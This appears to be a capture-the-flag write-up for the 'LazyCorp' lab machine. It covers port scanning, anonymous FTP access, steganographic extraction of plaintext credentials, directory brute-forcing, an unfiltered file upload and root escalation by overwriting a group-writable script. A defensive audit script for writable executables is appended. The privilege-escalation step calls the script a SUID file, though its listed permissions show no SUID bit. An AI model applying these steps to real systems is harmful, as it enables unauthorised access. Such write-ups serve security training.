Nmap
[root@Hacking] /home/kali/lazycorp
❯ nmap 192.168.55.152 -A -p-
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.55.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 114 119 4096 Jul 16 12:35 pub
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 46:82:43:4b:ef:e0:b0:50:04:c0:d5:2c:3c:5c:7d:4a (RSA)
| 256 52:79:ea:92:35:b4:f2:5d:b9:14:f0:21:1c:eb:2f:66 (ECDSA)
|_ 256 98:fa:95:86:04:75:31:39:c6:60:26:9e:26:86:82:88 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: LazyCorp | Empowering Devs
| http-robots.txt: 2 disallowed entries
|_/cms-admin.php /auth-LazyCorp-dev/
|_http-server-header: Apache/2.4.41 (Ubuntu)
The FTP service allows anonymous login.
Stegseek
[root@Hacking] /home/kali/lazycorp
❯ ftp 192.168.55.152
Connected to 192.168.55.152.
220 (vsFTPd 3.0.5)
Name (192.168.55.152:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11020|)
150 Here comes the directory listing.
drwxr-xr-x 2 114 119 4096 Jul 16 12:35 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44460|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1366786 Jul 16 12:35 note.jpg
226 Directory send OK.
ftp> get note.jpg
local: note.jpg remote: note.jpg
229 Entering Extended Passive Mode (|||34814|)
150 Opening BINARY mode data connection for note.jpg (1366786 bytes).
100% |***************************************************************************************************| 1334 KiB 183.63 MiB/s 00:00 ETA
226 Transfer complete.
1366786 bytes received in 00:00 (53.00 MiB/s)
ftp>
An image was found, and it contains a set of user credentials.
[root@Hacking] /home/kali/lazycorp
❯ stegseek note.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "creds.txt".
[i] Extracting to "note.jpg.out".
[root@Hacking] /home/kali/lazycorp
❯ cat note.jpg.out
Username: dev
Password: d3v3l0pm3nt!nt3rn
Dir scan
[root@Hacking] /home/kali/lazycorp
❯ dirsearch -u http://192.168.55.152
_|. _ _ _ _ _ _|_ v0.4.3
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.152/
[16:02:37] Scanning:
[16:02:38] 403 - 279B - /.php
[16:02:42] 301 - 315B - /blog -> http://192.168.55.152/blog/
[16:02:42] 403 - 279B - /blog/
[16:02:45] 200 - 582B - /index.html
[16:02:48] 200 - 55B - /robots.txt
[16:02:48] 403 - 279B - /server-status
[16:02:48] 403 - 279B - /server-status/
[16:02:49] 301 - 318B - /uploads -> http://192.168.55.152/uploads/
[16:02:49] 403 - 279B - /uploads/
Task Completed
In the /blog directory there are several notes left in HTML comments that are worth noting:
/blog/blog.php
<!-- Arvind: He used note.jpg again. Let's see how long it lasts this time. -->
/blog/blog1.php
<!-- Hidden Hint: Sometimes the simplest transfer method—one that preserves every byte—protects the hidden secrets best. -->
/blog/blog2.php
<!-- Arvind: Reset script was never meant to be writeable by anyone... yet here we are. -->
/blog/blog3.php
<!-- Arvind: bro you forgot to disable that old login -->
The last post contains a link, but following it only returns Access Denied, and there is no special parameter that changes that.
[root@Hacking] /home/kali/lazycorp
❯ feroxbuster -u http://192.168.55.152/auth-lazycorp-dev/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.55.152/auth-lazycorp-dev/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c http://192.168.55.152/auth-lazycorp-dev/auth-LazyCorp-dev
404 GET 9l 31w 276c http://192.168.55.152/auth-lazycorp-dev/cms-admin.php
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 336c http://192.168.55.152/auth-lazycorp-dev/uploads => http://192.168.55.152/auth-lazycorp-dev/uploads/
200 GET 21l 53w 710c http://192.168.55.152/auth-lazycorp-dev/login.php
200 GET 0l 0w 0c http://192.168.55.152/auth-lazycorp-dev/uploads/shell.php
302 GET 0l 0w 0c http://192.168.55.152/auth-lazycorp-dev/dashboard.php => login.php
Upload
The username and password found earlier log in to the form; the upload has no filtering at all, and files end up under /auth-lazycorp-dev/uploads/.
Root
Found a SUID file in the home directory.
arvind@arvindlazycorp:~$ ls -al /usr/bin/reset_site.sh
-rwxrwxr-x 1 root arvind 1183448 Aug 19 07:58 /usr/bin/reset_site.sh
arvind@arvindlazycorp:~$ id
uid=1000(arvind) gid=1000(arvind) groups=1000(arvind),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),117(lxd)
So it is enough to replace reset_site.sh with bash.
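The weakness above is a root-owned script in /usr/bin that a normal user can overwrite. The following audit script is an added example (not part of the original writeup) that a defender can run to list executables in a directory, or in every directory on PATH, that are writable by group or others; the function names and the sample files in the test are constructed for this illustration.

```shell
#!/bin/sh
# Added example: audit executables for group- or world-writable bits.
# A script such as /usr/bin/reset_site.sh with mode -rwxrwxr-x and
# group arvind lets any member of that group replace its contents;
# if root later runs it, the replacement runs as root.

# List regular executable files directly inside DIR that are writable
# by group or by others, one path per line, sorted.
find_writable_execs() {
    dir="$1"
    find "$dir" -maxdepth 1 -type f \
        \( -perm -g+w -o -perm -o+w \) \
        \( -perm -u+x -o -perm -g+x -o -perm -o+x \) \
        2>/dev/null | sort
}

# Print owner, group and mode for each path on stdin (report format).
describe_paths() {
    while IFS= read -r path; do
        # ls -ld keeps the output stable for files and symlinks alike
        ls -ld "$path"
    done
}

# Walk every directory on PATH and report loosely permissioned executables.
audit_path_dirs() {
    oldifs=$IFS
    IFS=:
    for d in $PATH; do
        if [ -d "$d" ]; then
            find_writable_execs "$d"
        fi
    done
    IFS=$oldifs
}

# Stand-alone use: audit the caller's PATH. The fix for each hit is
# normally `chmod go-w FILE` (or `chmod 755 FILE`) and a check of who
# runs the file (cron, systemd, sudo rules).
if [ "${AUDIT_RUN:-1}" = "1" ] && [ -z "$AUDIT_QUIET" ]; then
    audit_path_dirs | describe_paths
fi
```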